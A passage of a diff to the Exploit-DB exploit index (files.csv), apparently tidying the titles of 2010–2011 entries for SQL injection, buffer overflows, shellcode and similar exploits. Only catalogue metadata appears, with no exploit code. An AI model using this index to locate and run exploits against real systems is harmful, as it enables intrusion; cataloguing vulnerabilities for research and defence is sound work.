Vulnerability",2010-07-23,SONIC,php,webapps,0 14445,platforms/php/webapps/14445.txt,"ZeeMatri 3.x - Arbitrary File Upload Vulnerability",2010-07-23,SONIC,php,webapps,0 14446,platforms/php/webapps/14446.txt,"PhotoPost PHP SQL Injection Vulnerability",2010-07-23,Cyber-sec,php,webapps,0 14447,platforms/windows/remote/14447.html,"Multiple Web Browser Clickjacking Vulnerability (FF3.6.7/SM 2.0.6)",2010-07-23,"Pouya Daneshmand",windows,remote,0 @@ -12715,7 +12715,7 @@ id,file,description,date,author,platform,type,port 14477,platforms/windows/dos/14477.txt,"Media Player Classic - Heap Overflow/DoS Vulnerability",2010-07-26,"Praveen Darshanam",windows,dos,0 14481,platforms/php/webapps/14481.txt,"Joomla Component TTVideo 1.0 - SQL Injection Vulnerability",2010-07-27,"Salvatore Fresta",php,webapps,0 14482,platforms/windows/local/14482.py,"QQPlayer 2.3.696.400p1 - smi File Buffer Overflow Exploit",2010-07-27,"Lufeng Li",windows,local,0 -14484,platforms/windows/dos/14484.html,"Internet Explorer 6 / 7 - Remote DoS Vulnerability",2010-07-27,"Richard leahy",windows,dos,0 +14484,platforms/windows/dos/14484.html,"Microsoft Internet Explorer 6 / 7 - Remote DoS Vulnerability",2010-07-27,"Richard leahy",windows,dos,0 14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion Vulnerability",2010-07-27,"John Leitch",php,webapps,0 14491,platforms/windows/local/14491.txt,"Zemana AntiLogger AntiLog32.sys <= 1.5.2.755 - Local Privilege Escalation Vulnerability",2010-07-28,th_decoder,windows,local,0 14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - HTTP Remote Buffer Overflow (Post Auth)",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0 @@ -12758,7 +12758,7 @@ id,file,description,date,author,platform,type,port 14541,platforms/php/webapps/14541.txt,"WordPress NextGEN Smooth Gallery 0.12 - Blind SQL Injection Vulnerability",2010-08-03,kaMtiEz,php,webapps,0 14550,platforms/windows/local/14550.py,"Exploit Easy RM to MP3 2.7.3.700 - (.m3u & .pls & .smi & .wpl & .wax & .wvx & .ram)",2010-08-04,"Oh Yaw Theng",windows,local,0 14545,platforms/windows/dos/14545.txt,"Progitek Visionner Photos 2.0 - File Format DoS",2010-08-03,antrhacks,windows,dos,0 -14566,platforms/windows/local/14566.c,"Microsoft Windows - Win32k.sys Driver ""CreateDIBPalette()"" Buffer Overflow",2010-08-06,Arkon,windows,local,0 +14566,platforms/windows/local/14566.c,"Microsoft Windows - Win32k.sys Driver _CreateDIBPalette()_ Buffer Overflow",2010-08-06,Arkon,windows,local,0 14547,platforms/windows/remote/14547.txt,"HP OpenView NNM 7.53 OvJavaLocale - Buffer Overflow Vulnerability",2010-08-03,"Nahuel Riva",windows,remote,0 14551,platforms/windows/remote/14551.html,"FathFTP 1.8 - (DeleteFile Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0 14552,platforms/windows/remote/14552.html,"FathFTP 1.8 (EnumFiles Method) ActiveX Buffer Overflow (SEH)",2010-08-04,Madjix,windows,remote,0 @@ -12820,7 +12820,7 @@ id,file,description,date,author,platform,type,port 14625,platforms/windows/dos/14625.py,"CombiWave Lite 4.0.1.4 - Denial of Service Vulnerability",2010-08-12,"Oh Yaw Theng",windows,dos,0 14628,platforms/win32/webapps/14628.txt,"PHP-Nuke-8.1-seo-Arabic Remote File Include",2010-08-12,LoSt.HaCkEr,win32,webapps,80 14629,platforms/multiple/webapps/14629.html,"Kleeja Upload - CSRF Change Admin Password",2010-08-12,"KOLTN S",multiple,webapps,80 -14630,platforms/windows/local/14630.py,"Mediacoder 0.7.5.4710 - ""Universal"" SEH Buffer Overflow Exploit",2010-08-12,Dr_IDE,windows,local,0 +14630,platforms/windows/local/14630.py,"Mediacoder 0.7.5.4710 - _Universal_ SEH Buffer Overflow Exploit",2010-08-12,Dr_IDE,windows,local,0 14633,platforms/windows/local/14633.py,"Xion Player 1.0.125 - Stack Buffer Overflow Exploit",2010-08-13,corelanc0d3r,windows,local,0 14634,platforms/windows/dos/14634.txt,"SmartCode ServerX VNC Server ActiveX 1.1.5.0 (scvncsrvx.dll) DoS Exploit",2010-08-13,LiquidWorm,windows,dos,0 14676,platforms/windows/local/14676.pl,"A-PDF WAV to MP3 Converter 1.0.0 - (.m3u) Stack Buffer Overflow",2010-08-17,d4rk-h4ck3r,windows,local,0 @@ -12829,7 +12829,7 @@ id,file,description,date,author,platform,type,port 14637,platforms/php/webapps/14637.txt,"Get Tube All Versions SQL Injection Vulnerability",2010-08-13,Mr.P3rfekT,php,webapps,0 14639,platforms/php/webapps/14639.txt,"MailForm 1.2 - Remote File Include",2010-08-13,LoSt.HaCkEr,php,webapps,0 14640,platforms/php/webapps/14640.txt,"ACollab - Multiple Vulnerabilities",2010-08-14,"AmnPardaz ",php,webapps,0 -14641,platforms/multiple/remote/14641.py,"Adobe ColdFusion Directory Traversal Vulnerability",2010-08-14,Unknown,multiple,remote,0 +14641,platforms/multiple/remote/14641.py,"Adobe ColdFusion - Directory Traversal Vulnerability",2010-08-14,Unknown,multiple,remote,0 14642,platforms/windows/dos/14642.txt,"Acrobat Acrobat - Font Parsing Integer Overflow Vulnerability",2010-08-14,"Ramz Afzar",windows,dos,0 14643,platforms/php/webapps/14643.txt,"sFileManager <= 24a - Local File Inclusion Vulnerability",2010-08-14,Pepelux,php,webapps,0 14644,platforms/php/webapps/14644.html,"Saurus CMS Admin Panel - Multiple CSRF Vulnerabilities",2010-08-14,"Fady Mohammed Osman",php,webapps,0 @@ -12980,14 +12980,14 @@ id,file,description,date,author,platform,type,port 14839,platforms/php/webapps/14839.txt,"GuestBookPlus HTML Injection & Bypass Comments Limit",2010-08-29,"MiND C0re",php,webapps,0 14840,platforms/windows/dos/14840.py,"Mereo 1.9.2 - Remote HTTP Server Denial of Service Vulnerability",2010-08-30,"CwG GeNiuS",windows,dos,0 14841,platforms/php/webapps/14841.txt,"seagull 0.6.7 - Remote File Inclusion Vulnerability",2010-08-30,"FoX HaCkEr",php,webapps,0 -14843,platforms/windows/dos/14843.txt,"Apple QuickTime ""_Marshaled_pUnk"" Backdoor Param Client-Side Arbitrary Code Execution",2010-08-30,"Ruben Santamarta ",windows,dos,0 +14843,platforms/windows/dos/14843.txt,"Apple QuickTime __Marshaled_pUnk_ Backdoor Param Client-Side Arbitrary Code Execution",2010-08-30,"Ruben Santamarta ",windows,dos,0 14845,platforms/php/webapps/14845.txt,"Joomla Component (com_picsell) Local File Disclosure Vulnerability",2010-08-30,Craw,php,webapps,0 14846,platforms/php/webapps/14846.txt,"Joomla Component (com_jefaqpro) Multiple Blind SQL Injection Vulnerabilities",2010-08-31,"Chip d3 bi0s",php,webapps,0 14849,platforms/php/webapps/14849.py,"mBlogger 1.0.04 (viewpost.php) - SQL Injection Exploit",2010-08-31,"Ptrace Security",php,webapps,0 14854,platforms/php/webapps/14854.py,"Cpanel PHP - Restriction Bypass Vulnerability (0day)",2010-09-01,Abysssec,php,webapps,0 14851,platforms/php/webapps/14851.txt,"dompdf 0.6.0 beta1 - Remote File Inclusion Vulnerability",2010-09-01,Andre_Corleone,php,webapps,0 14852,platforms/windows/dos/14852.txt,"leadtools ActiveX common dialogs 16.5 - Multiple Vulnerabilities",2010-09-01,LiquidWorm,windows,dos,0 -14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - ""newclass"" invalid pointer",2010-09-01,Abysssec,windows,remote,0 +14853,platforms/windows/remote/14853.py,"Adobe Acrobat Reader and Flash Player - _newclass_ invalid pointer",2010-09-01,Abysssec,windows,remote,0 14870,platforms/asp/webapps/14870.txt,"rainbowportal - Multiple Vulnerabilities",2010-09-02,Abysssec,asp,webapps,0 14856,platforms/windows/remote/14856.txt,"TFTPDWIN 0.4.2 - Directory Traversal Vulnerability",2010-09-01,chr1x,windows,remote,0 14857,platforms/windows/remote/14857.txt,"tftp desktop 2.5 - Directory Traversal Vulnerability",2010-09-01,chr1x,windows,remote,0 @@ -12999,7 +12999,7 @@ id,file,description,date,author,platform,type,port 14873,platforms/win32/shellcode/14873.asm,"Shellcode Checksum Routine",2010-09-02,dijital1,win32,shellcode,0 14875,platforms/multiple/remote/14875.txt,"Accton-based switches (3com / Dell_ SMC / Foundry / EdgeCore) - Backdoor Password",2010-09-02,"Edwin Eefting",multiple,remote,0 14876,platforms/php/webapps/14876.txt,"Shop a la Cart Multiple Vulnerabilities",2010-09-02,Ariko-Security,php,webapps,0 -14886,platforms/windows/remote/14886.py,"Movie Maker- Remote Code Execution (MS10-016)",2010-09-04,Abysssec,windows,remote,0 +14886,platforms/windows/remote/14886.py,"Movie Maker - Remote Code Execution (MS10-016)",2010-09-04,Abysssec,windows,remote,0 14878,platforms/windows/remote/14878.html,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner Remote Code Execution",2010-09-03,Abysssec,windows,remote,0 14879,platforms/asp/webapps/14879.txt,"visinia 1.3 - Multiple Vulnerabilities",2010-09-03,Abysssec,asp,webapps,0 14882,platforms/windows/dos/14882.txt,"FFDshow - SEH Exception leading to NULL pointer on Read",2010-09-03,"Matthew Bergin",windows,dos,0 @@ -13020,7 +13020,7 @@ id,file,description,date,author,platform,type,port 14902,platforms/php/webapps/14902.txt,"Joomla Component Clantools 1.2.3 - Multiple Blind SQL Injection Vulnerability",2010-09-05,Solidmedia,php,webapps,0 14904,platforms/linux/dos/14904.txt,"FCrackZip 1.0 - Local Buffer Overflow Proof of Concept",2010-09-05,0x6264,linux,dos,0 14913,platforms/asp/webapps/14913.txt,"DMXReady Members Area Manager Persistent XSS Vulnerability",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 -14907,platforms/arm/shellcode/14907.c,"Linux/ARM - execve(""/bin/sh""_ [0]_ [0 vars]) (27 bytes)",2010-09-05,"Jonathan Salwan",arm,shellcode,0 +14907,platforms/arm/shellcode/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) (27 bytes)",2010-09-05,"Jonathan Salwan",arm,shellcode,0 14908,platforms/asp/webapps/14908.txt,"DMXready Polling Booth Manager SQL Injection Vulnerability",2010-09-05,"L0rd CrusAd3r",asp,webapps,0 14909,platforms/windows/dos/14909.py,"Virtual DJ Trial 6.1.2 SEH Buffer Overflow Crash Proof of Concept",2010-09-05,"Abhishek Lyall",windows,dos,0 14910,platforms/php/webapps/14910.txt,"Softbiz Article Directory Script (sbiz_id) Blind SQL Injection Vulnerability",2010-09-05,"BorN To K!LL",php,webapps,0 @@ -13031,7 +13031,7 @@ id,file,description,date,author,platform,type,port 14916,platforms/windows/dos/14916.py,"HP OpenView NNM - webappmon.exe execvp_nc Remote Code Execution",2010-09-06,Abysssec,windows,dos,0 14919,platforms/asp/webapps/14919.txt,"Micronetsoft Rental Property Management Website SQL Injection Vulnerability",2010-09-06,"L0rd CrusAd3r",asp,webapps,0 14922,platforms/php/webapps/14922.txt,"Joomla Component Aardvertiser 2.1 Free Blind SQL Injection Vulnerability",2010-09-06,"Stephan Sattler",php,webapps,0 -14923,platforms/php/webapps/14923.txt,"Wordpress Events Manager Extended Plugin Persistent XSS Vulnerability",2010-09-06,Craw,php,webapps,0 +14923,platforms/php/webapps/14923.txt,"Wordpress Events Manager Extended Plugin - Persistent XSS Vulnerability",2010-09-06,Craw,php,webapps,0 14931,platforms/php/webapps/14931.php,"java Bridge 5.5 - Directory Traversal Vulnerability",2010-09-07,Saxtor,php,webapps,0 14925,platforms/linux/remote/14925.txt,"weborf <= 0.12.2 - Directory Traversal Vulnerability",2010-09-07,Rew,linux,remote,0 14927,platforms/php/webapps/14927.txt,"dynpage <= 1.0 - Multiple Vulnerabilities (0day)",2010-09-07,Abysssec,php,webapps,0 @@ -13068,7 +13068,7 @@ id,file,description,date,author,platform,type,port 14977,platforms/php/webapps/14977.txt,"MyHobbySite 1.01 SQL Injection and Authentication Bypass Vulnerability",2010-09-12,"YuGj VN",php,webapps,0 14979,platforms/php/webapps/14979.txt,"AlstraSoft AskMe Pro 2.1 (forum_answer.php?que_id) SQL Injection Vulnerability",2010-09-12,Amine_92,php,webapps,0 14980,platforms/asp/webapps/14980.txt,"eshtery CMS - SQL Injection Vulnerability",2010-09-12,Abysssec,asp,webapps,0 -14982,platforms/windows/local/14982.py,"Adobe Acrobat and Reader - ""pushstring"" Memory Corruption",2010-09-12,Abysssec,windows,local,0 +14982,platforms/windows/local/14982.py,"Adobe Acrobat and Reader - _pushstring_ Memory Corruption",2010-09-12,Abysssec,windows,local,0 14985,platforms/php/webapps/14985.txt,"System Shop (Module aktka) SQL Injection Vulnerability",2010-09-12,secret,php,webapps,0 14986,platforms/php/webapps/14986.txt,"AlstraSoft AskMe Pro 2.1 (profile.php?id) SQL Injection Vulnerability",2010-09-12,CoBRa_21,php,webapps,0 14987,platforms/windows/dos/14987.py,"Kingsoft Antivirus <= 2010.04.26.648 Kernel Buffer Overflow Exploit",2010-09-13,"Lufeng Li",windows,dos,0 @@ -13109,7 +13109,7 @@ id,file,description,date,author,platform,type,port 15034,platforms/windows/dos/15034.txt,"Microsoft Mspaint bmp Crash Proof Of Concept",2010-09-18,andrew,windows,dos,0 15035,platforms/windows/dos/15035.py,"Apple QuickTime FLI LinePacket - Remote Code Execution Vulnerability",2010-09-18,Abysssec,windows,dos,0 15037,platforms/php/webapps/15037.html,"CMSimple - CSRF Vulnerability",2010-09-18,Abysssec,php,webapps,0 -15039,platforms/php/webapps/15039.txt,"xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection ""reviews.php""",2010-09-18,secret,php,webapps,0 +15039,platforms/php/webapps/15039.txt,"xt:Commerce Gambio 2008 - 2010 ERROR Based SQL Injection _reviews.php_",2010-09-18,secret,php,webapps,0 15040,platforms/php/webapps/15040.txt,"Joomla Component (com_restaurantguide) Multiple Vulnerabilities",2010-09-18,Valentin,php,webapps,0 15041,platforms/php/webapps/15041.py,"Maian Gallery 2 - Local File Download Vulnerability",2010-09-18,mr_me,php,webapps,0 15044,platforms/asp/webapps/15044.txt,"jmd-cms - Multiple Vulnerabilities",2010-09-19,Abysssec,asp,webapps,0 @@ -13125,7 +13125,7 @@ id,file,description,date,author,platform,type,port 15058,platforms/asp/webapps/15058.html,"VWD-CMS - CSRF Vulnerability",2010-09-20,Abysssec,asp,webapps,0 15060,platforms/php/webapps/15060.txt,"LightNEasy CMS 3.2.1 - Blind SQL Injection Vulnerability",2010-09-20,Solidmedia,php,webapps,0 15061,platforms/windows/dos/15061.txt,"Microsoft drm technology (msnetobj.dll) ActiveX Multiple Vulnerabilities",2010-09-20,"Asheesh kumar Mani Tripathi",windows,dos,0 -15062,platforms/linux/dos/15062.txt,"RarCrack 0.2 - ""filename"" init() .bss PoC",2010-09-20,Stoke,linux,dos,0 +15062,platforms/linux/dos/15062.txt,"RarCrack 0.2 - _filename_ init() .bss PoC",2010-09-20,Stoke,linux,dos,0 15063,platforms/windows/shellcode/15063.c,"win32/xp sp3 (Tr) Add Admin Account Shellcode 127 bytes",2010-09-20,ZoRLu,windows,shellcode,0 15064,platforms/php/webapps/15064.txt,"primitive CMS 1.0.9 - Multiple Vulnerabilities",2010-09-20,"Stephan Sattler",php,webapps,0 15065,platforms/windows/dos/15065.txt,"Microsoft Excel - WOPT Record Parsing Heap Memory Corruption",2010-09-21,Abysssec,windows,dos,0 @@ -13269,7 +13269,7 @@ id,file,description,date,author,platform,type,port 15238,platforms/windows/remote/15238.py,"Disk Pulse Server 2.2.34 - Remote Buffer Overflow Exploit",2010-10-12,"xsploited security",windows,remote,0 15239,platforms/php/webapps/15239.html,"WikiWebHelp 0.3.3 - Cross-Site Request Forgery Vulnerability",2010-10-12,Yoyahack,php,webapps,0 15240,platforms/php/webapps/15240.txt,"Collabtive 0.65 - Multiple Vulnerabilities",2010-10-12,"Anatolia Security",php,webapps,0 -15241,platforms/windows/remote/15241.txt,"Oracle Java 6 - OBJECT tag ""launchjnlp""/""docbase"" Param Buffer Overflow Exploit",2010-10-13,Skylined,windows,remote,0 +15241,platforms/windows/remote/15241.txt,"Oracle Java 6 - OBJECT tag _launchjnlp_/_docbase_ Param Buffer Overflow Exploit",2010-10-13,Skylined,windows,remote,0 15242,platforms/windows/dos/15242.html,"Firefox 3.5.10 & 3.6.6 WMP Memory Corruption Using Popups",2010-10-13,Skylined,windows,dos,0 15243,platforms/windows/dos/15243.html,"Oracle Java APPLET Tag Children Property Memory Corruption",2010-10-13,Skylined,windows,dos,0 15244,platforms/unix/remote/15244.txt,"Oracle Virtual Server Agent Command Injection",2010-10-13,"Nahuel Grisolia",unix,remote,0 @@ -13379,7 +13379,7 @@ id,file,description,date,author,platform,type,port 15371,platforms/windows/remote/15371.txt,"yaws 1.89 - Directory Traversal Vulnerability",2010-11-01,nitr0us,windows,remote,0 15373,platforms/windows/remote/15373.txt,"mongoose Web server 2.11 - Directory Traversal Vulnerability",2010-11-01,nitr0us,windows,remote,0 15376,platforms/windows/local/15376.c,"Trend Micro Titanium Maximum Security 2011 - Local Kernel Exploit (0day)",2010-11-01,"Nikita Tarakanov",windows,local,0 -15378,platforms/windows/dos/15378.py,"Sybase Advantage Data Architect - ""*.SQL"" Format Heap Oveflow",2010-11-01,d0lc3,windows,dos,0 +15378,platforms/windows/dos/15378.py,"Sybase Advantage Data Architect - _*.SQL_ Format Heap Oveflow",2010-11-01,d0lc3,windows,dos,0 15380,platforms/hardware/dos/15380.txt,"Xerox 4595 - Denial of Service Vulnerability",2010-11-01,chap0,hardware,dos,0 15381,platforms/php/webapps/15381.txt,"Collabtive SQL Injection Vulnerability",2010-11-01,"Anatolia Security",php,webapps,0 15382,platforms/asp/webapps/15382.txt,"douran portal <= 3.9.7.55 - Multiple Vulnerabilities",2010-11-01,ITSecTeam,asp,webapps,0 @@ -13413,10 +13413,10 @@ id,file,description,date,author,platform,type,port 15415,platforms/php/webapps/15415.txt,"MiniBB 2.5 - SQL Injection Vulnerability",2010-11-04,"High-Tech Bridge SA",php,webapps,0 15416,platforms/php/webapps/15416.txt,"JBI CMS SQL Injection Vulnerability",2010-11-04,Cru3l.b0y,php,webapps,0 15417,platforms/windows/local/15417.pl,"GSPlayer 1.83a Win32 Release Buffer Overflow Vulnerability",2010-11-04,moigai,windows,local,0 -15418,platforms/windows/dos/15418.html,"Internet Explorer Memory - Corruption Vulnerability (0day)",2010-11-04,Unknown,windows,dos,0 +15418,platforms/windows/dos/15418.html,"Microsoft Internet Explorer Memory - Corruption Vulnerability (0day)",2010-11-04,Unknown,windows,dos,0 15419,platforms/windows/dos/15419.txt,"Acrobat Reader 9.4 - Memory Corruption Vulnerability",2010-11-04,scup,windows,dos,0 15420,platforms/windows/dos/15420.c,"Avast! Internet Security - aswtdi.sys Local DoS PoC (0day)",2010-11-04,"Nikita Tarakanov",windows,dos,0 -15421,platforms/windows/remote/15421.html,"Internet Explorer 6/7/8 - Memory Corruption Exploit (0day)",2010-11-04,ryujin,windows,remote,0 +15421,platforms/windows/remote/15421.html,"Microsoft Internet Explorer 6/7/8 - Memory Corruption Exploit (0day)",2010-11-04,ryujin,windows,remote,0 15422,platforms/windows/dos/15422.pl,"Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit",2010-11-05,wingthor,windows,dos,0 15423,platforms/android/remote/15423.html,"Android 2.0-2.1 - Reverse Shell Exploit",2010-11-05,"MJ Keith",android,remote,0 15427,platforms/windows/remote/15427.txt,"WinTFTP Server Pro 3.1 - Remote Directory Traversal Vulnerability (0day)",2010-11-05,"Yakir Wizman",windows,remote,0 @@ -13490,7 +13490,7 @@ id,file,description,date,author,platform,type,port 15509,platforms/php/webapps/15509.txt,"Build a Niche Store 3.0 - (BANS) Authentication Bypass Vulnerability",2010-11-13,"ThunDEr HeaD",php,webapps,0 15510,platforms/php/webapps/15510.txt,"AWCM 2.1 final - Remote File Inclusion Vulnerability",2010-11-13,LoSt.HaCkEr,php,webapps,0 15512,platforms/php/webapps/15512.py,"DBSite Remote SQL Injection Vulnerability",2010-11-13,God_Of_Pain,php,webapps,0 -15513,platforms/php/webapps/15513.txt,"Wordpress Event Registration Plugin 5.32 SQL Injection Vulnerability",2010-11-13,k3m4n9i,php,webapps,0 +15513,platforms/php/webapps/15513.txt,"Wordpress Event Registration Plugin 5.32 - SQL Injection Vulnerability",2010-11-13,k3m4n9i,php,webapps,0 15514,platforms/windows/dos/15514.txt,"Foxit Reader 4.1.1 - Stack Overflow Vulnerability",2010-11-13,dookie,windows,dos,0 15515,platforms/php/webapps/15515.txt,"Invision Power Board 3 - search_app SQL Injection Vulnerability",2010-11-13,"Lord Tittis3000",php,webapps,0 15516,platforms/php/webapps/15516.txt,"EasyJobPortal Shell Upload Vulnerability",2010-11-13,MeGo,php,webapps,0 @@ -13562,7 +13562,7 @@ id,file,description,date,author,platform,type,port 15624,platforms/windows/local/15624.txt,"CA Internet Security Suite 2010 - KmxSbx.sys Kernel Pool Overflow (0day)",2010-11-28,"Nikita Tarakanov",windows,local,0 15625,platforms/cgi/webapps/15625.txt,"Skeletonz CMS Permanent XSS Vulnerability",2010-11-28,Jbyte,cgi,webapps,0 15626,platforms/windows/local/15626.py,"OTSTurntables 1.00.048 - (m3u/ofl) Local BoF Exploit (SEH)",2010-11-28,0v3r,windows,local,0 -15627,platforms/asp/webapps/15627.html,"Site2Nite Big Truck Broker ""txtSiteId"" SQL Injection Vulnerability",2010-11-28,underground-stockholm.com,asp,webapps,0 +15627,platforms/asp/webapps/15627.html,"Site2Nite Big Truck Broker _txtSiteId_ SQL Injection Vulnerability",2010-11-28,underground-stockholm.com,asp,webapps,0 15628,platforms/windows/dos/15628.py,"Hanso Player 1.4.0 - (.m3u) Denial of Service Vulnerability",2010-11-28,anT!-Tr0J4n,windows,dos,0 15629,platforms/asp/webapps/15629.txt,"MicroNetSoft RV Dealer Website search.asp & showAlllistings.asp - SQL Injection",2010-11-29,underground-stockholm.com,asp,webapps,0 15630,platforms/windows/local/15630.py,"Mediacoder 0.7.5.4792 - Buffer Overflow Exploit (SEH)",2010-11-29,0v3r,windows,local,0 @@ -13639,7 +13639,7 @@ id,file,description,date,author,platform,type,port 15705,platforms/linux/dos/15705.txt,"GNU inetutils 1.8-1 - FTP Client Heap Overflow",2010-12-07,Rew,linux,dos,0 15706,platforms/windows/local/15706.txt,"Winamp 5.6 - Arbitrary Code Execution in MIDI Parser",2010-12-08,"Kryptos Logic",windows,local,0 15707,platforms/multiple/dos/15707.txt,"Wonderware InBatch <= 9.0sp1 - Buffer Overflow Vulnerability",2010-12-08,"Luigi Auriemma",multiple,dos,0 -15708,platforms/windows/dos/15708.html,"Internet Explorer 8 CSS Parser Denial of Service",2010-12-08,WooYun,windows,dos,0 +15708,platforms/windows/dos/15708.html,"Microsoft Internet Explorer 8 - CSS Parser Denial of Service",2010-12-08,WooYun,windows,dos,0 15744,platforms/cgi/webapps/15744.txt,"Gitweb <= 1.7.3.3 - Cross-Site Scripting",2010-12-15,emgent,cgi,webapps,80 15745,platforms/linux/local/15745.txt,"IBM Tivoli Storage Manager (TSM) Local Root",2010-12-15,"Kryptos Logic",linux,local,0 15710,platforms/multiple/webapps/15710.txt,"Apache Archiva 1.0 - 1.3.1 - CSRF Vulnerability",2010-12-09,"Anatolia Security",multiple,webapps,0 @@ -13670,7 +13670,7 @@ id,file,description,date,author,platform,type,port 15741,platforms/php/webapps/15741.txt,"Pointter PHP Micro-Blogging Social Network Unauthorized Privilege Escalation",2010-12-15,"Mark Stanislav",php,webapps,0 15742,platforms/php/webapps/15742.txt,"BEdita 3.0.1.2550 - Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0 15743,platforms/php/webapps/15743.txt,"BLOG:CMS <= 4.2.1e - Multiple Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0 -15746,platforms/windows/remote/15746.rb,"Internet Explorer 8 CSS Parser Exploit",2010-12-15,"Nephi Johnson",windows,remote,0 +15746,platforms/windows/remote/15746.rb,"Microsoft Internet Explorer 8 - CSS Parser Exploit",2010-12-15,"Nephi Johnson",windows,remote,0 15747,platforms/windows/local/15747.py,"Aesop GIF Creator <= 2.1 - (.aep) Buffer Overflow Exploit",2010-12-16,xsploitedsec,windows,local,0 15748,platforms/php/webapps/15748.txt,"QualDev eCommerce script SQL Injection Vulnerability",2010-12-16,ErrNick,php,webapps,0 15749,platforms/php/webapps/15749.txt,"Joomla JRadio Component (com_jradio) Local File Inclusion",2010-12-16,Sid3^effects,php,webapps,0 @@ -13956,7 +13956,7 @@ id,file,description,date,author,platform,type,port 16120,platforms/windows/dos/16120.py,"Hanso Player 1.4.0.0 - Buffer Overflow - DoS Skinfile",2011-02-06,badc0re,windows,dos,0 16121,platforms/windows/dos/16121.py,"Hanso Converter 1.1.0 - BufferOverflow Denial of Service",2011-02-06,badc0re,windows,dos,0 16122,platforms/php/webapps/16122.txt,"Dew-NewPHPLinks 2.1b (index.php) - SQL Injection Vulnerability",2011-02-06,"AtT4CKxT3rR0r1ST ",php,webapps,0 -16221,platforms/php/webapps/16221.txt,"Comment Rating 2.9.23 Wordpress Plugin Multiple Vulnerabilities",2011-02-23,"High-Tech Bridge SA",php,webapps,0 +16221,platforms/php/webapps/16221.txt,"Comment Rating 2.9.23 Wordpress Plugin - Multiple Vulnerabilities",2011-02-23,"High-Tech Bridge SA",php,webapps,0 16127,platforms/php/webapps/16127.txt,"T-Content Managment System Multiple Vulnerabilities",2011-02-07,"Daniel Godoy",php,webapps,0 16128,platforms/php/webapps/16128.txt,"jakcms 2.0 pro rc5 - Stored XSS via useragent http header injection",2011-02-07,"Saif El-Sherei",php,webapps,0 16129,platforms/linux/dos/16129.txt,"ProFTPD mod_sftp Integer Overflow DoS PoC",2011-02-07,kingcope,linux,dos,0 @@ -13975,7 +13975,7 @@ id,file,description,date,author,platform,type,port 16167,platforms/php/webapps/16167.txt,"jSchool Advanced SQL Injection Vulnerability",2011-02-14,eXa.DisC,php,webapps,0 16168,platforms/php/webapps/16168.txt,"runcms 2.2.2 - Multiple Vulnerabilities",2011-02-14,"High-Tech Bridge SA",php,webapps,0 16143,platforms/php/webapps/16143.txt,"MihanTools Script 1.3.3 - SQL Injection Vulnerability",2011-02-09,WHITE_DEVIL,php,webapps,0 -16144,platforms/php/webapps/16144.txt,"Enable Media Replace WordPress Plugin Multiple Vulnerabilities",2011-02-09,"Ulf Harnhammar",php,webapps,0 +16144,platforms/php/webapps/16144.txt,"Enable Media Replace WordPress Plugin - Multiple Vulnerabilities",2011-02-09,"Ulf Harnhammar",php,webapps,0 16145,platforms/windows/remote/16145.pl,"Unreal Tournament Remote Buffer Overflow Exploit (SEH)",2011-02-09,Fulcrum,windows,remote,0 16183,platforms/php/webapps/16183.txt,"GAzie 5.10 (Login parameter) Multiple Vulnerabilities",2011-02-17,LiquidWorm,php,webapps,0 16165,platforms/php/webapps/16165.txt,"AWCM 2.2 Final - Persistent Cross-Site Script Vulnerability",2011-02-14,_84kur10_,php,webapps,0 @@ -14004,7 +14004,7 @@ id,file,description,date,author,platform,type,port 16178,platforms/asp/webapps/16178.txt,"Rae Media Real Estate Single Agent SQL Injection Vulnerability",2011-02-16,R4dc0re,asp,webapps,0 16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent SQL Injection Vulnerability",2011-02-16,R4dc0re,asp,webapps,0 16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - (.csv) Denial of Service Vulnerability",2011-02-17,b0telh0,windows,dos,0 -16181,platforms/php/webapps/16181.txt,"WordPress User Photo Component Remote File Upload Vulnerability",2011-02-17,ADVtools,php,webapps,0 +16181,platforms/php/webapps/16181.txt,"WordPress User Photo Component - Remote File Upload Vulnerability",2011-02-17,ADVtools,php,webapps,0 16182,platforms/linux/dos/16182.txt,"PHP 5.3.5 grapheme_extract() NULL Pointer Dereference",2011-02-17,"Maksymilian Arciemowicz",linux,dos,0 16193,platforms/windows/dos/16193.pl,"Avira AntiVir QUA file - (avcenter.exe) Local Crash PoC",2011-02-19,KedAns-Dz,windows,dos,0 16204,platforms/windows/dos/16204.pl,"Solar FTP 2.1 - Denial of Service Exploit",2011-02-22,x000,windows,dos,0 @@ -14032,7 +14032,7 @@ id,file,description,date,author,platform,type,port 16222,platforms/php/webapps/16222.txt,"course registration management system 2.1 - Multiple Vulnerabilities",2011-02-23,"AutoSec Tools",php,webapps,0 16223,platforms/php/webapps/16223.txt,"VidiScript SQL Injection Vulnerability",2011-02-23,ThEtA.Nu,php,webapps,0 16220,platforms/php/webapps/16220.py,"ProQuiz 2.0.0b Arbitrary Upload Vulnerability",2011-02-23,"AutoSec Tools",php,webapps,0 -16218,platforms/php/webapps/16218.txt,"Z-Vote 1.1 Wordpress Plugin SQL Injection Vulnerability",2011-02-23,"High-Tech Bridge SA",php,webapps,0 +16218,platforms/php/webapps/16218.txt,"Z-Vote 1.1 Wordpress Plugin - SQL Injection Vulnerability",2011-02-23,"High-Tech Bridge SA",php,webapps,0 16213,platforms/php/webapps/16213.txt,"Hyena Cart (index.php) SQL Injection Vulnerability",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 16214,platforms/php/webapps/16214.txt,"tplSoccerStats (player.php) SQL Injection Vulnerability",2011-02-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 16217,platforms/php/webapps/16217.txt,"bitweaver 2.8.1 Persistent XSS Vulnerability",2011-02-23,lemlajt,php,webapps,0 @@ -14041,11 +14041,11 @@ id,file,description,date,author,platform,type,port 16229,platforms/ios/remote/16229.txt,"iOS myDBLite 1.1.10 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0 